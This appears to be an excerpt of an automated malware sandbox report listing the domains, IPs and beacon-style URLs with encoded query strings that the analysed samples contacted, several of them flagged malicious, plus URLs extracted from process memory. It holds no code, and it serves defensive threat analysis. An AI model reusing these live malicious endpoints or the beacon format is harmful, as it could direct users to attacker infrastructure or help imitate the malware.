            http://www.duzane.com/6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw==0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-includes/js/jquery/ui/core.min.js?ver=1.13.20%Avira URL Cloudsafe
            https://api.w.org/0%Avira URL Cloudsafe
            https://www.west.cn/services/domain/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.mg55aa.xyz/2c61/0%Avira URL Cloudsafe
            https://www.witoharmuth.de/wp-json/0%Avira URL Cloudsafe
            http://www.zhuan-tou.com/lx5p/0%Avira URL Cloudsafe
            https://www.witoharmuth.de/0%Avira URL Cloudsafe
            http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-content/themes/hestia/style.min.css?ver=3.0.210%Avira URL Cloudsafe
            https://www.witoharmuth.de/ueber/0%Avira URL Cloudsafe
            https://www.chiark.greenend.org.uk/~sgtatham/putty/00%Avira URL Cloudsafe
            http://www.chowzen.top/fv92/0%Avira URL Cloudsafe
            http://www.lunareafurniture.com/wzcd/?kH=00U8ENLHk&TTv82Lg=FQzs5Gm41lAoc3qf/wWkUZspwwlJHXnDtyrZ3MD2xwlMLvR0+259MhI7Qpdm6NFMCSb0/6QDX0X/DlKTMMPY62KD9eqkA6d10wTN4I0Oir4qL663QSRv2YyvDfJ8itAe1g==0%Avira URL Cloudsafe
            http://gmpg.org/xfn/110%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.shrongcen.com
            		101.36.121.143
            		truetrue
              		unknown
              www.chowzen.top
              		162.0.213.72
              		truetrue
                		unknown
                td-ccm-neg-87-45.wixdns.net
                		34.149.87.45
                		truetrueunknown
                www.mg55aa.xyz
                		35.241.34.216
                		truefalse
                  		unknown
                  www.ie8mce.website
                  		176.113.70.180
                  		truetrue
                    		unknown
                    www.ffuel.network
                    		193.149.176.221
                    		truefalse
                      		unknown
                      www.am1-728585.com
                      		101.36.121.143
                      		truetrueunknown
                      www.zhuan-tou.com
                      		103.120.80.111
                      		truetrueunknown
                      www.lunareafurniture.com
                      		172.67.160.38
                      		truetrue
                        		unknown
                        www.duzane.com
                        		102.222.124.13
                        		truetrue
                          		unknown
                          skyinftech.com
                          		103.138.88.32
                          		truetrue
                            		unknown
                            www.witoharmuth.com
                            		85.13.162.190
                            		truetrueunknown
                            www.binpvae.lol
                            		116.213.43.190
                            		truetrue
                              		unknown
                              www.lecoinsa.net
                              		217.116.0.191
                              		truetrue
                                		unknown
                                www.webuyfontana.com
                                		3.64.163.50
                                		truetrue
                                  		unknown
                                  www.kacotae.com
                                  		64.226.69.42
                                  		truetrue
                                    		unknown
                                    www.magnoliahairandco.com
                                    		unknown
                                    		unknowntrueunknown
                                    www.skyinftech.com
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.ie8mce.website/3osa/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.mg55aa.xyz/2c61/?TTv82Lg=RJfS4vARZYm/oi22NSuVxsKXUXvAzLUuwV1pBI27iejWxHvYHo2LN7gu8qRYW6QqNtSAiHHGlyBTLaey7TeG8lKmZ3wdB0uWw8RQPkcPoCC9P3J1+WeEqjNfAM7KpTz+0w==&kH=00U8ENLHkfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.webuyfontana.com/fhu0/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.lecoinsa.net/xu8t/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.binpvae.lol/a472/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.shrongcen.com/5965/?TTv82Lg=9jQYDwKIZi6/W0GvqqOWctdn1nDe86qQU37QFI3e35aKJbsuGODGFib0m7CCxXxx0blg9Tj0Vv9f5L3iX8JxT+4MBVsytoUBFOmu7GzeNBgPNO5fqFAxhyq0WiRZHbK4BA==&kH=00U8ENLHktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.witoharmuth.com/jd4u/true
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.duzane.com/6tsi/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.zhuan-tou.com/lx5p/?TTv82Lg=syyr9ehUh5Dik7pm/3o58LEiuz6t5Qsxa3AqbpTiKXwTN4MFTP1/ruYiG066Pw0RpEGKYU+Xmw7DJuAgJs5fVEIr+ru5VK8zeO7ugFBDIhF/xAum4x9tUt/OQm4f5IJVQQ==&kH=00U8ENLHktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.shrongcen.com/5965/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.witoharmuth.com/jd4u/?TTv82Lg=vZ8PZlFPVnVyyN885vZALLUChV9dHrd3y3rRI9QumGWurBO6VP20aAnkH/ZZbF4T7IQeomZ4+ZpTiLO44xxEwk6LrLidp4nJrApztAjEtY9oMR30BoZ74UoGsezUDnZKUQ==&kH=00U8ENLHktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.ie8mce.website/3osa/?kH=00U8ENLHk&TTv82Lg=AxLVOe86WIqquROk4wW2qAARSAB2s4BJoZSnRO1SGEf+ewBgrgY/U4+QoHX9+oVsrlzSfgcLZGl64XyGJnoqgpfIm3dacYKZHld6caimAIQJPM6fBdCSw8qvz7rbMrI9Lg==true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.am1-728585.com/9yv1/?kH=00U8ENLHk&TTv82Lg=JDOq8sdeR7GiqYjlH1+Kl93ySCj4A7pMbAnb3QvwXz09Z+TZO8TEz9zOGDteEA1FR7OBJaMhM3F8CenkIFufyI1/tJZv1FUS2g72fmKkU9bvVaC3pZ4GqQYdgiVFYuGLpQ==true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.chowzen.top/fv92/?TTv82Lg=yI7uf9Jd8tsljExy4FTr0CscnPTbskSU+DRNkHPE+tdYilYSwjyHdOnSjMDaN65WqOB1l5kApI34wyc+ZLKDjlKfvq1mMUqSyQn9fVkF1OZZ/SY1Zq2D8T+x+vB090fBaA==&kH=00U8ENLHktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.duzane.com/6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw==true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.mg55aa.xyz/2c61/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.zhuan-tou.com/lx5p/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.chowzen.top/fv92/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.lunareafurniture.com/wzcd/?kH=00U8ENLHk&TTv82Lg=FQzs5Gm41lAoc3qf/wWkUZspwwlJHXnDtyrZ3MD2xwlMLvR0+259MhI7Qpdm6NFMCSb0/6QDX0X/DlKTMMPY62KD9eqkA6d10wTN4I0Oir4qL663QSRv2YyvDfJ8itAe1g==true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.binpvae.lol/a472/?TTv82Lg=jmdR8js2K745w9duG20fYqFnwU+bCGk1cWKHz342ws1XHieKZe3C99dpKKnD83tJkcayHzCeZ9pypijZiF65Efqxzc0IleT34n8kjQ1m2nEIGr+ujgw0M5ErIDQmrZA0lA==&kH=00U8ENLHktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.skyinftech.com/gwqo/?kH=00U8ENLHk&TTv82Lg=okHduu9bAgMM6c4GdEVgS1G+EVcXjBymZ/AEM3aFVKlZzziUwfhKvtqGWgkRboMd4eWK0/sAAMCd+0rGXOBNsjDOL2SA50vrXr2QK+Wy7YL6dLNwijbZiWqDBeKnevfe7g==true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.webuyfontana.com/fhu0/?TTv82Lg=w/3cKlYOZ7/u5gm7pV9f/KUaDpReXY6iTJBfq3uhFW9siwux7V61qX9CS7/86gr+3Jfc1RyXdSHIkUzafqUvuKZrochJkYXYnzSwKE48OKXAFHRmaq8ieG3R1w7I9MISvw==&kH=00U8ENLHktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.lunareafurniture.com/wzcd/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.kacotae.com/1134/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.skyinftech.com/gwqo/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.kacotae.com/1134/?kH=00U8ENLHk&TTv82Lg=JRkLtFSsjC7w4kQ+Hghs1xAb5q91nLV93kknhelN5q6byYvj/Lx1HFkRT0D1h5CmR4/eZjEjURe15+EWWNTABSUQK+lvVBorOgW9ps6acI3n3nS9RerGGmYjuLu9ItylLw==true
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabwrite.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jswrite.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://duckduckgo.com/ac/?q=write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jswrite.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.witoharmuth.de/verkehrswende/write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.csswrite.exe, 00000015.00000002.4525142132.00000000065D6000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003CD6000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://themeisle.comwrite.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.onelook.com/?w=BPSHhDGmARC.exe.0.drfalse
                                      • 2%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://track.uc.cn/collectwrite.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.west.cn/services/mail/write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.witoharmuth.de/kontakt/write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.witoharmuth.de/wp-content/themes/hestia/assets/js/script.min.js?ver=3.0.21write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.witoharmuth.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.1write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/css/bootstrap.min.css?ver=1.0.2write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://js.users.51.la/21876343.jswrite.exe, 00000015.00000002.4525142132.0000000006120000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003820000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 3%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.witoharmuth.de/feed/write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://hm.baidu.com/hm.js?write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwrite.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://hm.baidu.com/hm.js?656519d7bd35a3f2337e0cc6c7d88db2write.exe, 00000015.00000002.4525142132.0000000006120000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003820000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.lunareafurniture.comRLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4526253929.0000000004F53000.00000040.80000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.witoharmuth.de/wp-content/uploads/2022/02/P1010619-scaled.jpg);write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jswrite.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.west.cn/cloudhost/write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csswrite.exe, 00000015.00000002.4525142132.00000000065D6000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003CD6000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.witoharmuth.de/sample-page/write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCFV20240600121.exe, 00000000.00000002.2093778209.00000000033F3000.00000004.00000800.00020000.00000000.sdmp, BPSHhDGmARC.exe, 0000000D.00000002.2305537186.00000000028EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.csswrite.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.duzane.com/6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmNwrite.exe, 00000015.00000002.4525142132.0000000005DFC000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.00000000034FC000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.witoharmuth.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.witoharmuth.de/xmlrpc.php?rsdwrite.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://download.quark.cn/download/quarkpc?platform=android&ch=pcquarkwrite.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.witoharmuth.de/comments/feed/write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icowrite.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.west.cn/services/webhosting/write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.webuyfontana.com/write.exe, 00000015.00000002.4525142132.0000000006C1E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000431E000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.litespeedtech.com/error-pagewrite.exe, 00000015.00000002.4525142132.0000000006444000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003B44000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/js/bootstrap.min.js?ver=1.0.2write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.witoharmuth.de/wp-includes/css/dist/block-library/style.min.css?ver=6.5.4write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.witoharmuth.de/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://api.w.org/RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.west.cn/services/domain/write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.witoharmuth.de/wp-json/RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.witoharmuth.de/RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.witoharmuth.de/ueber/write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.witoharmuth.de/wp-content/themes/hestia/style.min.css?ver=3.0.21write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.ecosia.org/newtab/write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0CFV20240600121.exe, BPSHhDGmARC.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://gmpg.org/xfn/11write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.witoharmuth.de/wp-content/plugins/themeisle-companion/obfx_modules/companion-legacy/assetwrite.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.jswrite.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ac.ecosia.org/autocomplete?q=write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.west.cn/ykj/view.asp?domain=zhuan-tou.comwrite.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
